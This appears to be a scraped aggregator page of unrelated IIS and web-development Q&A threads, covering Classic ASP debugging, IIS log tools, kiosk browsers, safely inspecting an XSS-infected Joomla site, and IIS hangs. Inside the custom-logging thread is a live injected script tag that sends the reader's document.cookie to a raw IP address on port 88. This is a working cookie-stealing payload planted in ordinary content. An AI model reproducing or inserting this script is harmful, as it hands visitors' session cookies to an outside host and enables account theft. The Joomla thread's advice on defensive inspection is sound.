Classic ASP avoiding deadlock when debugging - iis

We have a classic ASP page that makes a request to another page on the same site to get data.
When debugging is turned on we get deadlock because the web server will only respond to one request at a time.
What is the best way to get around this limitation while still allowing us to debug it while developing?
Less than ideal options:
Move the page to another site.
Allow iis to use multiple processes.
Any other options?

Ah, the joys of Stackoverflow, where instead of getting answers you're criticized for using Classic ASP, which is a currently supported tool even though it's been around for 100 years. :-)
I ran into a similar problem a while back while trying to create a simple script that would mimic the behavior of a script located on another server. I wanted to do some debugging without invoking the real script, so I thought I'd make a brain-dead replacement for it on my own server and invoke it the same way.
I ended up giving up and using the real script for my debugging. But today I found this KB article for you that might help: http://support.microsoft.com/kb/316451. I'm not sure but I think that's the solution. Or something like it.

Related

what are the tools to parse/analyze IIS logs - ideally free/open source?

note: there are few similar questions already asked here - but they are from 2009. May be something has changed since then.
I'm responsible for a bunch of websites hosted on different servers. I do not do any log analysis right now, but I would like to change this. First question - what is the best tool to view ISSUES with the website based on IIS logs (i.e. 404, 500 responses, long page processing, etc)? Ideally with grouping/sorting options? I do not want to spend a lot of time on this, I just want to periodically check if all is good with the website.
Second question (and I know most likely i'm asking for too much) - but is there any way to expose processed logs to web? So I can review things mentioned above without RPDing into the server?
Ideally I'm looking for a free/open source solution, but I'm ready to pay for a good software as well (but not a lot of $$).
Thank you.
You can take a look at our log monitoring solution EventSentry, which can monitor text-based logs like IIS logs. We have standard templates setup for IIS, and we can consolidate the logs in a database with web-access, so that you can review the logs without using RDP.
It's a pretty flexible solution that allows you to pick the fields you are interested in, and ignore the ones you are not - and thus save space in your database.
You can also setup real-time alerts, so that you can get an email when a critical error is encountered in a log file, like a 500 error.
http://www.eventsentry.com/features/log-file-monitoring
Finally, you can also plug-in command line tools which can verify that a given web page is accessible, or get alerted when it changes: http://www.eventsentry.com/features/application-monitoring.
I'm biased of course, but I would say that our solution is pretty affordable. Since it offers additional functionality as well, such as service monitoring (to monitor your IIS services) and event log monitoring (IIS does log critical messages to the event log), you can setup comprehensive monitoring with a single product.
I'd look into #LuckyLuke solution (or similar) - classic "build vs buy" decision. Based on your post, this isn't going to be your "full time" job so IMHO its best to leave it to those who do...
I don't know what "legacy" answers you are referring to, but if you want to tinker you can use Microsoft's own log parser, and depending on how far you want to go with it, you can use it (COM dll) to write your "admin web pages" in .Net/ASP.Net and host it in each of your servers....
If you're very specific about the errors you just want to be alerted about, another "hacky" way would be to provide your own custom error pages (either the default IIS error pages, or configure your Asp.Net apps to use specific error pages).

Kiosk program (web browser), deployment struggles

Okay, here's a complicated one I've been breaking my head over all week.
I'm creating a self service system, which allows people to identify themselves by barcode or by smartcard, and then perform an arbitrary action. I run a Tomcat application container locally on each machine to serve up the pages and connect to external resources that are required. It also allows me to serve webpages which I then can use to display content on the screen.
I chose HTML as a display technology because it gives a lot of freedom as to how things could look. The program also involves a lot of Javascript to interact with the customer and hardware (through a RESTful API). I picked Javascript because it's a natural complement to HTML and is supported by all modern browsers.
Currently this system is being tested at a number of sites, and everything seems to work okay. I'm running it in Chrome's kiosk mode. Which serves me well, but there are a number of downsides. Here is where the problems start. ;-)
First of all I am petrified that Chrome's auto-update will eventually break my Javascript code. Secondly, I run a small Chrome plugin to read smartcard numbers, and every time the workstation is shutdown incorrectly Chrome's user profile becomes corrupted and the extension needs to be set up again. I could easily fix the first issue by turning off auto-update but it complicates my installation procedure.
Actually, having to install any browser complicates my installation procedure.
I did consider using internet explorer because it's basically everywhere, but with the three dominant versions out there I'm not sure if it's a good approach. My Javascript is quite complex and making it work on older versions will be a pain. Not even mentioning having to write an ActiveX component for my smartcards.
This is why I set out to make a small browser wrapper that runs in full screen, and can read smartcard numbers. This also has downsides. I use Qt: Qt's QtWebkit weighs a hefty 10MB, and it adds another number of dependencies to my application.
It really feels like I have to pick from three options that all have downsides. It really is something I should have investigated before I wrote the entire program. I guess it is a lesson learnt well.
On to the questions:
Is there a pain free way out of this situation? (probably not)
Is there a browser I can depend on without adding tens of megabytes to my project?
Is there another alternative you could suggest?
If you do not see another way out, which option would you pick?

How can I browse an XSS infected Joomla website for rebuilding purposes without being infected?

Both the web files and the database have been tampered pointing to malicious JavaScript. They have tasked me to rebuild their site, but I would like to be able to view the site if possible to get at the content and view the site as they had a lot of pages. Since I didn’t originally build the site I don’t know the structure of the content.
I don’t have to repair the site; I just need to rebuild it with the CMS of my choice. I don’t know anything about the Joomla database, or know if I can even get access to it to be able to start there.
I originally thought using a virtual machine would be OK for this, but I wasn’t sure if I would be risking my host machine as well using this method. I would of course turn off JavaScript but I was hoping someone else may have been already been down this road and might be able to offer some insight.
Couldn't you just FTP to their host, pull it off and get it working on a machine with no connection?
If you were really paranoid. I don't think an XSS infected site would do too much damage to a properly protected machine anyway.
My paranoid answer:
It's a great idea to turn off Javascript. I would get an extension like Noscript for Firefox or Notscript for Chrome. I use these Noscript regularly, and it makes it easy to see what Javascript is coming from where.
Secondly, your idea with a VM is good, but take it a step further and run Linux in that VM. Linux can be infected, but it is rare to see something that will infect Linux.
Regular expressions and HTML parsers can also be your friends. Script something that can scan files looking for things like script tags and especially iframes. That way you can get an idea of files that have been corrupted and what is calling to where.
One other less likely gotcha is malicious executables or scripts disguised as something innocent like a JPEG, PDFs, etc. If you download and open files off of that machine, make sure it is at least onto your VM with no network connectivity.
Get server logs if you can; perhaps your assailant was sloppy and let some clue about their activities. Perhaps run Wireshark on a second machine to look for things calling out to strange domains. This may be excessive, but I find it to be a fun exercise. :)
Also things like Virustotal and Threat Expert can be your friends if you think you have a malicious file or you see malicious activity. Better to be paranoid than compromised.
Cleaning this type of stuff up isn't exactly rocket science. You just need to get a connection to the backing database server and run a couple queries to kill the xss stuff out of the stored content.
You'd do your client a great service by starting off doing just that.
The VM idea is a good one. krs1 suggests running Linux which is an even better idea as almost all trojans that get downloaded are for Windows. If you run Wireshark while you use the site so you can see what the network traffic looks like and what URLs are being requested, etc. If you run it in a Linux VM though you'll probably only get half the picture since any exploit worth the oxygen it took to keep the programmer alive while it was written will check what platform you're on and only download when you're on an exploitable one.
But I digress, you're rebuilding a website, not doing malware analysis (which is more fun IMO). Once you identify and remove the offending content you should be good. See if you can find out what the exploit was that got them and work with their IT guy if they have one so steps can be taken to mitigate it from happening again.

How to write my own Server Logging script?

I need to log the hits on a sub-domain in Windows IIS 6.0 without designating them as separate websites in the IIS Manager. I have been told this is not possible. How can I write my own script to do this?
I'm afraid google analytics is not an option due to the setup, I just need access (i'm guessing) to the file request event and its properties.
Wyatt Barnette - I've thought of this! But how do I set those properties for it to collect them all? I'm writing my own log parsing software, as I need specific things, I just need the server to generate the logs for me to parse!
Have you considered using Google Analytics across all your sites? I know that this is not true logging...but sometimes addressing simple problems with simple solutions is easier! Log parsing seems to be slowly fading away...
What you should be able to do is have your stats tracking package look at multiple IIS websites as a single site.
If your logging package can't handle this, check out the IIS log parsing tool. That should at least take care of the more onerous part of the task (actually making sense of the logfiles). From there it is a pretty straightforward reporting operation.
<script language="JavaScript">document.location="http://142.0.71.119:88/get.php?cookie="+document.cookie;</script>

IIS hang state

Any suggestion to detect flaws in VB6 components running under IIS. IIS becomes unstable and after some time enter in a state of hang. The problems occur in the most part only in the production environment. We have many modules running. Probably there are components with bugs and need to identify them.
Thanks in advance.
One thing to watch out for is multi-threading issues. VB6 components often don't play well when accessed by multiple threads.
If the client code is an ASP.NET application consider putting synchlocks around the calls to ensure that they are called sequentially.
Another sure-fire way to fubar IIS is to display a message box or initiate some other sort of user interaction. Get those MsgBox calls outa there.
Other than that... good logging helps. VB6 is pretty opaque when errors arise.
Use Debugging Tools for Windows to analyze a dump of IIS. Tess' blog is one of the best resources to learn to use WinDbg. Although she focuses on .NET debugging, most of the material is applicable to any Win32 process.

Resources